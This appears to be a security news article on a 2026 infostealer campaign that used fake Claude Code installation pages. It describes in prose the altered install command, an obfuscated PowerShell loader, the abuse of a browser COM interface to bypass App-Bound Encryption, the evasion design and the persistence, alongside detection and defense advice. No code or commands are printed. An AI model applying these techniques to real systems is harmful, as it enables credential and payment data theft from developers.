A previously undocumented information stealer has been distributed through fake Claude Code installation pages, hijacking Chromium browsers to bypass App-Bound Encryption and exfiltrate cookies, passwords and payment data from developer workstations.
The campaign was detailed on 11 May by Ontinue's Cyber Defense Center, which traced the activity to three operator-controlled domains registered within a six-day window in April 2026. Victims arrived at the lookalike installation page after clicking sponsored search results for "install claude code."
The lure page mimicked the layout of legitimate Claude Code documentation but rendered an altered one-line installation command directly in HTML, swapping the canonical Anthropic host for an attacker-controlled domain.
The /install.ps1 file at that domain returned a verbatim copy of the genuine installer, making automated URL scanners observe entirely clean PowerShell while the visible command on the page sent victims elsewhere.
A Native Helper Designed to Evade Behavioral Rules
Once executed, the pasted command fetched a heavily obfuscated PowerShell loader of approximately 600 KB.
The loader enumerated Chromium-family browsers, including Chrome, Edge, Brave, Vivaldi, Perplexity Comet and Arc, and reflectively injected a 4608-byte native helper into a live browser process.
The helper's sole function is to invoke the browser's IElevator2 COM interface, introduced in Chrome 144, to recover the App-Bound Encryption key. The technique mirrors the approach first documented in Glove Stealer in late 2024, but diverges in design.
Ontinue, a provider of AI-powered managed agentic SOC services, noted that the helper exposes no network, file or cryptographic imports. All detection-visible activity, such as SQLite access, archive construction and HTTPS exfiltration, was confined to the PowerShell layer. The split appeared engineered specifically to defeat behavioral rule sets that inspect native binaries in isolation.
Developer Workstations as a High-Value Pivot
Ontinue's compile-date evidence places the sample's construction within 60 days of the Chrome 144 release in January 2026, indicating an actively maintained development effort tracking upstream Chromium changes.
A transcription error in the embedded Edge IElevator2 IID, with two nibbles transposed in the Data3 field, causes the initial call to fail silently and trigger a fallback to the legacy IElevator interface. Ontinue highlighted that the malformed identifier doubles as a high-confidence detection signature.
The loader established persistence via a Windows scheduled task that polled the operator's C2 every minute and exited early if the host's region matched an exclusion list covering Iran, Russia and other Commonwealth of Independent States (CIS) members, among others.
Vineeta Sangaraju, AI tesearch engineer at Black Duck, said the choice of target is what makes the campaign worth attention.
"Developers hold the keys to an organization's most sensitive assets - intellectual property, cloud infrastructure, CI/CD pipelines," she said. "One compromised developer workstation does not stay contained. It pivots into source code repositories, into cloud environments and into downstream software."
Ontinue urged defenders to enforce PowerShell Constrained Language Mode, enable script block logging and apply web content filtering against newly registered domains.